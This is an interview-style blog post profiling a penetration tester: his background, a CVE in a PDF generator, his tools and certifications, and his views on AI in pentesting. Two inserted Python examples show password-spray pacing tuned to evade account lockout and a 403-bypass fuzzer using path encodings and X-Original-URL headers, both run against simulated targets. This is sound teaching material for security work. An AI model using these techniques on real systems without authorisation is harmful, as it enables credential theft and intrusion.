PTaaS Checklist
Don't just "check the box". Learn 7 factors that will ensure your next pentest is a strategic advantage for your business.

Pentester Spotlight: Arben Shala

The Cobalt Pentester Spotlight highlights the fascinating journey of our Core members. Through an interview style, we share their experiences, background, and insights into the world of an accomplished pentester.


1. What's your handle? Do you use more than one? Where did it come from/ What's the origin story?

Until recently, I used the handle "spenkk", which was a childhood nickname that most of my friends used to call me. Lately, I’ve switched to "arbenn", which is simply a reference to my first name.

2. What got you into cybersecurity? How did you get into pentesting specifically?

My journey into cybersecurity started around 2010 when I first installed BackTrack Linux. I’m not sure exactly where I first heard about it, but while researching Wi-Fi hacking, someone recommended it. It ended up being the first Linux OS I installed and used.

A few years later, my interest grew, and I started exploring tools like Metasploit and Burp Suite, while also testing my skills on VulnHub machines. Eventually, a friend introduced me to HackTheBox, and I became completely hooked. Each machine and challenge taught me something new, and I kept pushing myself to improve. Reflecting on what I knew when I first joined the platform, and then reaching the top ten of the all-time leaderboard just a few months later, was a huge boost of confidence and motivation to keep improving in offensive security.


3. What exploit or clever attack are you most proud of and why?

Over the past few years, I have discovered several noteworthy vulnerabilities, both on my own and in collaboration with colleagues. One I can mention is the most recent, CVE-2024-53353, which I discovered quickly through source code analysis. The issue involved manipulating a PDF generator and getting around its filter for specific payloads in order to inject malicious payloads that could retrieve internal system files. To maximize the impact, I figured out a way to exploit the issue as a low-privileged user, demonstrating how an attacker could leverage it in a real-world scenario.

4. What is your go-to brag when talking about your pentesting skills?

I’ve found multiple high-impact vulnerabilities, but in most cases they were discovered using basic yet effective methods. One example from my pentesting experience at Cobalt was coming across multiple SSRF vulnerabilities in PDF generators. Some had existing PoCs, while others required me to craft bypass payloads to exploit them successfully.

Another interesting case was an SSTI vulnerability that occurred in an email inbox when a password reset request was made. To achieve full RCE, I had to bypass a sandbox restriction, which made the exploit particularly challenging, but it had critical impact in the end.

5. Share a time something went wrong in the course of a pentest? What happened and what did you do?

Similar to many experienced pentesters, I’ve had my share of “Oh no!” moments, although they’re pretty rare. One that comes to mind is accidentally locking high-privileged accounts during a password-spraying attack. It’s one of those things that can happen despite careful tuning of delays and thresholds. Another was unintentionally overwriting data due to a missing access control issue, something that shouldn’t have been possible in the first place. These situations are always a learning experience, but they also highlight a bigger issue: many organizations don’t provide staging or dev environments for testing. When we’re forced to test in production with limited accounts and user roles, the risk of unexpected data manipulation across tenants or impacting business operations increases. Of course, when things go wrong, we immediately communicate with the client and work to mitigate any impact while ensuring they understand the underlying security gap that allowed it to happen in the first place.
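The lockout risk described in that answer comes down to pacing: each user may see only so many bad attempts inside the directory's observation window. The following is an added example (Python, not the interviewee's tooling and not part of the original post) that derives a safe delay between spray rounds from an assumed lockout policy (threshold 5, 30-minute observation window) and checks it against a constructed stand-in directory that resets an account's bad-password counter once the window has elapsed. The accounts, passwords and policy values are all constructed.

```python
"""Pace a password spray so that no account trips the domain lockout policy.

Added illustration, not the interviewee's tooling. The policy values
(lockout threshold 5, 30-minute observation window) and the accounts are
constructed; SimulatedDirectory is a stand-in that expires bad attempts
once the observation window has passed, which is the behaviour the pacing
below assumes.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass
class LockoutPolicy:
    threshold: int        # bad attempts that lock the account (0 = never)
    window: timedelta     # observation window after which bad attempts expire


@dataclass
class AccountState:
    bad_attempts: List[datetime] = field(default_factory=list)
    locked: bool = False


class SimulatedDirectory:
    """Constructed target that enforces LockoutPolicy per account."""

    def __init__(self, policy: LockoutPolicy, creds: Dict[str, str]) -> None:
        self.policy = policy
        self.creds = creds
        self.state = {user: AccountState() for user in creds}

    def attempt(self, user: str, password: str, now: datetime) -> bool:
        st = self.state[user]
        if st.locked:
            return False
        # Bad attempts older than the observation window no longer count.
        cutoff = now - self.policy.window
        st.bad_attempts = [t for t in st.bad_attempts if t > cutoff]
        if self.creds.get(user) == password:
            st.bad_attempts.clear()
            return True
        st.bad_attempts.append(now)
        if self.policy.threshold and len(st.bad_attempts) >= self.policy.threshold:
            st.locked = True
        return False

    def locked_accounts(self) -> List[str]:
        return sorted(u for u, st in self.state.items() if st.locked)


def plan_interval(policy: LockoutPolicy, margin: int = 1) -> timedelta:
    """Delay between rounds so each user sees at most
    (threshold - 1 - margin) bad attempts per observation window.
    The margin leaves room for the user's own typos during the test."""
    if policy.threshold == 0:
        return timedelta(0)
    per_window = max(1, policy.threshold - 1 - margin)
    return policy.window / per_window


def run_spray(directory: SimulatedDirectory, users: List[str], passwords: List[str],
              interval: timedelta, start: datetime) -> Tuple[List[Tuple[str, str]], timedelta]:
    """One password per round across all users, waiting `interval` between rounds.
    Returns the credentials found and the simulated elapsed time."""
    hits: List[Tuple[str, str]] = []
    now = start
    for i, password in enumerate(passwords):
        if i:
            now += interval
        for user in users:
            if directory.attempt(user, password, now):
                hits.append((user, password))
    return hits, now - start


POLICY = LockoutPolicy(threshold=5, window=timedelta(minutes=30))
USERS = ["alice", "bob", "carol"]
PASSWORDS = ["Winter2024!", "Summer2024!", "Spring2025!", "Autumn2024!", "Welcome1!"]
START = datetime(2025, 1, 6, 9, 0)


def make_directory() -> SimulatedDirectory:
    # Constructed credentials; only bob uses a seasonal password.
    return SimulatedDirectory(POLICY, {"alice": "c0rrect-h0rse", "bob": "Spring2025!", "carol": "x9!Lq-nope"})


def paced_spray():
    """Spray with the computed interval: bob's password is found, nobody is locked."""
    d = make_directory()
    hits, elapsed = run_spray(d, USERS, PASSWORDS, plan_interval(POLICY), START)
    return hits, d.locked_accounts(), elapsed


def naive_spray():
    """Same wordlist with no delay: alice and carol hit the threshold and lock."""
    d = make_directory()
    hits, _ = run_spray(d, USERS, PASSWORDS, timedelta(0), START)
    return hits, d.locked_accounts()


if __name__ == "__main__":
    print("paced:", paced_spray())
    print("naive:", naive_spray())
```

The interval is driven by the observation window, not a fixed sleep: with threshold 5 and a 30-minute window the rounds land 10 minutes apart, so five passwords take 40 minutes and no user ever accumulates more than three bad attempts in any window. Real environments differ (fine-grained password policies, per-user or per-group thresholds, IdP lockouts independent of the domain), so the policy has to be read from the target before the interval is trusted.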


6. What are your favorite tools or TTPs when conducting pentests? Why do you find them effective?

Although there are many great tools out there, my pentesting process would not be the same without Burp Suite and Ffuf (along with SecLists). I primarily use Ffuf for file/directory fuzzing and authorization bypassing (401/403), since it supports multiple wordlists at once. For network pentesting, I rely on Impacket, BloodHound, and Responder since I believe they’re crucial in infrastructure mapping, credential harvesting and code execution. Of course, there are other awesome tools that enhance the process, but I believe that these are the essentials.
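The 401/403 bypass use of multiple wordlists works by combining every entry of one list with every entry of another (ffuf's clusterbomb mode with two `-w file:KEY` wordlists) and keeping only responses whose status code falls outside a filter set. The following is an added example (Python, not ffuf itself and not the interviewee's code) that reproduces that enumeration offline: wordlist one holds encodings and parser confusions of an assumed gated path `/admin`, wordlist two holds override headers, and a constructed stub target stands in for the server. The stub's behaviour (an edge rule that string-matches the raw `/admin` prefix in front of a backend that normalises paths and trusts `X-Original-URL`) is an assumption chosen to make the mismatch visible.

```python
"""Clusterbomb enumeration of path and header mutations against a 403-gated URL.

Added illustration of the logic ffuf runs with two wordlists in clusterbomb
mode; ffuf itself is not used here. TARGET, both wordlists and stub_target
are constructed for the example.
"""
from itertools import product
from typing import Callable, Dict, List, Tuple
from urllib.parse import unquote

Response = Tuple[int, int]                         # (status code, content length)
Sender = Callable[[str, Dict[str, str]], Response]  # request path, headers -> response

TARGET = "/admin"   # assumed path that the edge answers with 403


def path_mutations(p: str) -> List[str]:
    """Wordlist 1: encodings and parser confusions of the gated path, plus a
    benign root path that header overrides can ride on."""
    return [p, p + "/", p + "/.", "/.;" + p, "/%2e" + p, p + "%20", p + "..;/", "/"]


def header_mutations(p: str) -> List[Dict[str, str]]:
    """Wordlist 2: override headers some backends honour; {} means none."""
    return [{}, {"X-Original-URL": p}, {"X-Rewrite-URL": p}, {"X-Forwarded-For": "127.0.0.1"}]


def normalise(path: str) -> str:
    """Backend-style normalisation: decode, drop ';' path parameters,
    collapse '.' and '..' segments."""
    segs: List[str] = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segs:
                segs.pop()
            continue
        segs.append(seg)
    return "/" + "/".join(segs)


def stub_target(path: str, headers: Dict[str, str]) -> Response:
    """Constructed target. Edge ACL: literal prefix match on the raw path.
    Backend: normalises the path and trusts X-Original-URL if present."""
    if path.lower().startswith("/admin"):
        return 403, 9
    effective = normalise(headers.get("X-Original-URL", path))
    if effective == "/admin":
        return 200, 1234
    return 404, 22


def fuzz(send: Sender, target: str,
         filter_codes: frozenset = frozenset({403, 404})) -> List[Tuple[str, str, int]]:
    """Send every (path, header) pair and keep responses not in filter_codes,
    the equivalent of ffuf -mode clusterbomb -fc 403,404."""
    hits: List[Tuple[str, str, int]] = []
    for path, hdrs in product(path_mutations(target), header_mutations(target)):
        status, _length = send(path, hdrs)
        if status not in filter_codes:
            hits.append((path, next(iter(hdrs), ""), status))
    return hits


if __name__ == "__main__":
    for hit in fuzz(stub_target, TARGET):
        print(hit)
```

Against this stub, the raw-prefix rule blocks every candidate that literally begins with `/admin`, while `/.;/admin` and `/%2e/admin` pass the edge and still normalise to `/admin` at the backend, and the plain `/` request succeeds only when `X-Original-URL` is set. In a real run the sender is an HTTP client, and the filter should also compare response lengths against a baseline so that a custom 200-status "access denied" page is not mistaken for a bypass.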

7. What are your favorite asset types (web applications, APIs, network, etc.) to pentest and why?

I enjoy web application pentesting the most. I see web applications as the entry point to an organization’s infrastructure, so finding a critical vulnerability here can sometimes lead to fully compromising a company. An attacker could pivot from the web app to the internal network, escalate privileges, and perform lateral movement, making web security crucial. Lately, I’ve also developed an interest in thick client (desktop application) testing. Many of these applications rely on outdated libraries and insecure code, making them a great target. I find it especially fun to reverse engineer them and intercept the web or database traffic. There’s usually a lot of juicy information hidden in these interactions, which makes testing them both challenging and rewarding.


8. What certifications do you have? Why did you go for those ones specifically?

I currently have OSCP, BSCP, CARTP, and CREST. I wanted to get a certification per skill, so I went for OSCP for general pentesting, BSCP for web, and CARTP for Azure cloud. This year I plan to focus more on red teaming and get certified in CRTO or CRTL.

9. What advice do you wish someone had given you when you first started pentesting?

Offensive security has different specializations, like red teaming, application security, reverse engineering, vuln research, etc. It’s a good idea to research these areas and see which one fits best. If someone is interested in web application penetration testing, they should focus on becoming skilled in that area and learning the vulnerability categories in depth. Constantly switching between different fields can make it feel like progress is slow and give the feeling that you are not learning anything, which might even lead to burnout. It’s usually best to build a strong foundation in one area before exploring others.


10. How do you approach explaining findings to customers during a pentest? Is there a way you discuss your findings with customers? How do you ensure they have a quality experience?

I always strive to create high-quality proof of concepts with clear definitions, step-by-step instructions, and a detailed impact analysis. My goal is to help the customer understand not just what the vulnerability is, but how it could be exploited by a malicious actor and what the real-world consequences could be. When writing the PoC, I put myself in the customer’s shoes, whether it’s a software developer or an IT professional who may not be familiar with pentesting tools. I make sure the reproduction steps are as clear and easy to follow as possible, ensuring that even someone without deep security expertise can verify and address the issue. If I discover a high or critical severity vulnerability, I immediately notify the customer so they can take action as soon as possible, rather than waiting until the final report.

11. What is your favorite part of working with a pentesting team? What about working on your own?

When an application has many functionalities, I prefer working with a team of two or three people. This way, we can cover more app functionality and learn from each other. For example, there have been times when a colleague found a vulnerable endpoint, and I discovered related ones, or when a teammate found a limited XSS vulnerability, and I worked on bypassing the WAF to escalate it into a no-user-interaction exploit.

On the other hand, working alone has its advantages. You have a clear overview of what has been tested and what still needs to be covered. It also allows for more detailed updates and a focused testing approach.

12. Why do you like pentesting with Cobalt?

I've been with Cobalt for four years, and I’ve never thought about quitting or even taking a break. The entire process—from the start of a pentest to its completion—is smooth and well-structured. One of the things I appreciate is having direct communication with clients through the dedicated channel. This makes it easy to address blockers or clarify any scope-related questions in real-time.
I also like the Cobalt App, which simplifies reporting findings, tracking progress, and receiving feedback for improvement. It also makes re-engaging in retests seamless, which helps maintain efficiency and continuity in testing.


13. What do customers or the media often misunderstand about pentesters?

A common misunderstanding is that pentesters are like the hackers in movies, typing a few commands and instantly gaining access to a system. In reality, we are ethical hackers who follow a structured methodology based on the testing scenario. Our goal is to identify as many vulnerabilities as possible within the given time and scope. However, sometimes we don’t find high or critical severity issues, which can lead to customer disappointment because they expected major security flaws. In those cases, we emphasize that not finding severe vulnerabilities is actually a good sign, as it means their security posture is strong.


14. How do you see pentesting changing in 2025 and over the next few years?

There's no doubt that AI will play a bigger role in pentesting, especially for repetitive and predictable tasks like input sanitization testing, access control checks, and reconnaissance. Automation will make these processes faster and more efficient, allowing pentesters to focus on more complex vulnerabilities. However, I don’t believe AI will fully replace human testers anytime soon, especially when it comes to business logic flaws and highly sensitive areas of an application or infrastructure. These types of vulnerabilities require critical thinking, creativity, and an understanding of context, which AI still struggles with. After all, why would anyone blindly trust an LLM to make security-critical decisions without human oversight? While AI will continue to enhance and accelerate certain aspects of pentesting, human expertise will remain essential for deep analysis, exploit chaining, and uncovering nuanced security risks that automation simply can't catch.


15. What's your p(Doom)? 

I’d say my p(Doom) is pretty high, not necessarily because of some massive, world-ending cyber event, but because of how many organizations are already hacked and don’t even know it. In the current era, AI-driven attacks are evolving fast, making phishing, deepfakes, and automated exploitation way more effective. All it takes is a script kiddie with basic prompting knowledge to force an AI agent to create a professional phishing attack scenario. Meanwhile, a lot of companies still don’t take security seriously enough. They lack proper infosec teams, don’t invest in cybersecurity solutions and cyber hygiene, and often don’t have the right detection in place. Data exfiltration happens all the time, and attackers can sit in networks for months, even years, without anyone noticing. The scariest part isn’t just the attacks, it’s how many breaches go completely under the radar.

About Noelle Hori
Noelle Hori is the Community Manager at Cobalt. She graduated with a Bachelor’s degree in Hospitality Management from San Francisco State University. With over 5 years of community leadership experience, she helps bring to life Cobalt's mission to transform traditional penetration testing with the innovative Pentesting as a Service (PtaaS) platform. Noelle partners closely with product and delivery teams to maximize the pentester experience on a modern security testing platform, while also helping guide community initiatives for the Cobalt Offensive Security Testing Platform.